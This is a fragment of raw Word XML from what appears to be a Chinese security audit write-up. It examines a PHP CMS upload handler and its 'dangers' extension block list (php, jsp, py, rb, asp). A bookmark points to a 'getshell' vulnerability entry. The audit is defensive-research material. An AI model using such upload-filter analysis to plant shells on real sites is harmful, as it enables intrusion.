            <v:rect id="_x0000_s1971" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1970" style="position:absolute;left:985;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1969" style="position:absolute;left:1085;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1968" style="position:absolute;left:1185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1967" style="position:absolute;left:1285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1966" style="position:absolute;left:1385;top:2856;width:3735;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1965" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1964" style="position:absolute;left:185;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1963" style="position:absolute;left:285;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1962" style="position:absolute;left:385;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1961" style="position:absolute;left:485;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1960" style="position:absolute;left:585;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1959" style="position:absolute;left:685;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1958" style="position:absolute;left:785;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1957" style="position:absolute;left:885;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1956" style="position:absolute;left:985;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1955" style="position:absolute;left:1085;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1954" style="position:absolute;left:1185;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1953" style="position:absolute;left:1285;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1952" style="position:absolute;left:1385;top:3182;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1951" style="position:absolute;left:2951;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1950" style="position:absolute;left:3072;top:3182;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1949" style="position:absolute;left:3313;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1948" style="position:absolute;left:3433;top:3182;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1947" style="position:absolute;left:3795;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1946" style="position:absolute;left:3915;top:3182;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1945" style="position:absolute;left:4156;top:3182;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1944" style="position:absolute;left:4277;top:3182;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1943" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1942" style="position:absolute;left:185;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1941" style="position:absolute;left:285;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1940" style="position:absolute;left:385;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1939" style="position:absolute;left:485;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1938" style="position:absolute;left:585;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1937" style="position:absolute;left:685;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1936" style="position:absolute;left:785;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1935" style="position:absolute;left:885;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1934" style="position:absolute;left:985;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1933" style="position:absolute;left:1085;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1932" style="position:absolute;left:1185;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1931" style="position:absolute;left:1285;top:3508;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1930" style="position:absolute;left:1385;top:3508;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1929" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1928" style="position:absolute;left:185;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1927" style="position:absolute;left:285;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1926" style="position:absolute;left:385;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1925" style="position:absolute;left:485;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1924" style="position:absolute;left:585;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1923" style="position:absolute;left:685;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1922" style="position:absolute;left:785;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1921" style="position:absolute;left:885;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1920" style="position:absolute;left:985;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1919" style="position:absolute;left:1085;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1918" style="position:absolute;left:1185;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1917" style="position:absolute;left:1285;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1916" style="position:absolute;left:1385;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1915" style="position:absolute;left:1485;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1914" style="position:absolute;left:1585;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1913" style="position:absolute;left:1685;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1912" style="position:absolute;left:1785;top:3834;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1911" style="position:absolute;left:4195;top:3834;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1910" style="position:absolute;left:4315;top:3834;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1909" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1908" style="position:absolute;left:185;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1907" style="position:absolute;left:285;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1906" style="position:absolute;left:385;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1905" style="position:absolute;left:485;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1904" style="position:absolute;left:585;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1903" style="position:absolute;left:685;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1902" style="position:absolute;left:785;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1901" style="position:absolute;left:885;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1900" style="position:absolute;left:985;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1899" style="position:absolute;left:1085;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1898" style="position:absolute;left:1185;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1897" style="position:absolute;left:1285;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1896" style="position:absolute;left:1385;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1895" style="position:absolute;left:1485;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1894" style="position:absolute;left:1585;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1893" style="position:absolute;left:1685;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1892" style="position:absolute;left:1785;top:4160;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1891" style="position:absolute;left:3954;top:4160;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1890" style="position:absolute;left:4074;top:4160;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1889" style="position:absolute;left:4195;top:4160;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1888" style="position:absolute;left:5;top:4423;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1887" style="position:absolute;left:185;top:4486;width:3735;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1886" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:4929" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8"/>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体"/>
                        <w:sz w:val="18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getUpload($htmlTagName = 'files')</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:right="5464"/>
                      <w:jc w:val="center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4" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="92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$files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array(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 if(!isset($_FILES[$htmlTagName])) return</w:t>
                    </w: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$files;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="9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/*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The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tag if an array. */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is_array($_FILES[$htmlTagName]['name']))</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="9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4" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="1380" w:right="1252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extract(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$_FILES[$htmlTagName]); foreach($name as $id =&gt; $filenam</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>e)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="13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17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empty($filename)) continue;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="1779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file[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'extension'] =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$this-&gt;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getExtension(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$filename);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10"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37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group id="_x0000_s1809" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:18.1pt;width:337.75pt;height:165.2pt;z-index:8296;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,362" coordsize="6755,3304">
            <v:rect id="_x0000_s1884" style="position:absolute;left:1617;top:367;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1883" style="position:absolute;left:1797;top:610;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1882" style="position:absolute;left:2520;top:610;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1881" style="position:absolute;left:2640;top:610;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1880" style="position:absolute;left:3604;top:610;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1879" style="position:absolute;left:3725;top:610;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1878" style="position:absolute;left:1617;top:873;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1877" type="#_x0000_t75" style="position:absolute;left:1797;top:936;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s1876" style="position:absolute;left:1617;top:1199;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1875" style="position:absolute;left:1797;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1874" style="position:absolute;left:1897;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1873" style="position:absolute;left:1997;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1872" style="position:absolute;left:2097;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1871" style="position:absolute;left:2197;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1870" style="position:absolute;left:2297;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1869" style="position:absolute;left:2397;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1868" style="position:absolute;left:2497;top:1262;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1867" style="position:absolute;left:2597;top:1262;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1866" style="position:absolute;left:3802;top:1262;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1865" style="position:absolute;left:3922;top:1262;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1864" style="position:absolute;left:4043;top:1262;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1863" style="position:absolute;left:4163;top:1262;width:2290;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1862" style="position:absolute;left:6453;top:1262;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1861" style="position:absolute;left:1617;top:1525;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1860" style="position:absolute;left:1797;top:1588;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1859" style="position:absolute;left:1617;top:1851;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1858" style="position:absolute;left:1797;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1857" style="position:absolute;left:1897;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1856" style="position:absolute;left:1997;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1855" style="position:absolute;left:2097;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1854" style="position:absolute;left:2197;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1853" style="position:absolute;left:2297;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1852" style="position:absolute;left:2397;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1851" style="position:absolute;left:2497;top:1914;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1850" style="position:absolute;left:2597;top:1914;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1849" style="position:absolute;left:5127;top:1914;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1848" style="position:absolute;left:5248;top:1914;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1847" style="position:absolute;left:5971;top:1914;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1846" style="position:absolute;left:6091;top:1914;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1845" style="position:absolute;left:1617;top:2177;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1844" style="position:absolute;left:1797;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1843" style="position:absolute;left:1897;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1842" style="position:absolute;left:1997;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1841" style="position:absolute;left:2097;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1840" style="position:absolute;left:2197;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1839" style="position:absolute;left:2297;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1838" style="position:absolute;left:2397;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1837" style="position:absolute;left:2497;top:2240;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1836" style="position:absolute;left:2597;top:2240;width:4699;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1835" style="position:absolute;left:7296;top:2240;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1834" style="position:absolute;left:1617;top:2503;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1833" style="position:absolute;left:1797;top:2566;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1832" style="position:absolute;left:4568;top:2566;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1831" style="position:absolute;left:4689;top:2566;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1830" style="position:absolute;left:5050;top:2566;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1829" style="position:absolute;left:5171;top:2566;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1828" style="position:absolute;left:5894;top:2566;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1827" style="position:absolute;left:6014;top:2566;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1826" style="position:absolute;left:6737;top:2566;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1825" style="position:absolute;left:6858;top:2566;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1824" style="position:absolute;left:1617;top:2829;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1823" style="position:absolute;left:1797;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1822" style="position:absolute;left:1897;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1821" style="position:absolute;left:1997;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1820" style="position:absolute;left:2097;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1819" style="position:absolute;left:2197;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1818" style="position:absolute;left:2297;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1817" style="position:absolute;left:2397;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1816" style="position:absolute;left:2497;top:2892;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1815" style="position:absolute;left:2597;top:2892;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1814" style="position:absolute;left:3320;top:2892;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1813" style="position:absolute;left:3440;top:2892;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1812" style="position:absolute;left:1617;top:3155;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1811" type="#_x0000_t75" style="position:absolute;left:1797;top:3218;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s1810" type="#_x0000_t202" style="position:absolute;left:1614;top:364;width:6750;height:3299" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7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getExtension($filename)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1894" w:firstLine="799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$extension =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pathinfo(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$filename, PATHINFO_EXTENSION);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="1063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empty($extension)) return 'txt'; if(strpos</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>($this-&gt;config-&gt;file-&gt;dangers,</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="765" w:hanging="80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strtolower(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$extension)) !== false) return 'txt'; return $extension;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续跟进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">getExtension </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37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808" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.25pt;width:337.5pt;height:50.85pt;z-index:832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88" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="645"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$config-&gt;file-&gt;dangers = 'php</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,jsp,py,rb,asp</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,'; // Dangerous file types.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rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>dangers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是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9"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="64"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="qibocms_分类系统最新版_前台无限制Getshell"/>
      <w:bookmarkStart w:id="91" w:name="_bookmark41"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>strpos($this-&gt;config-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>file-&gt;dangers, strtolower($extension))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="133"/>
        <w:ind w:left="515" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">!== false) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>return  'txt'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
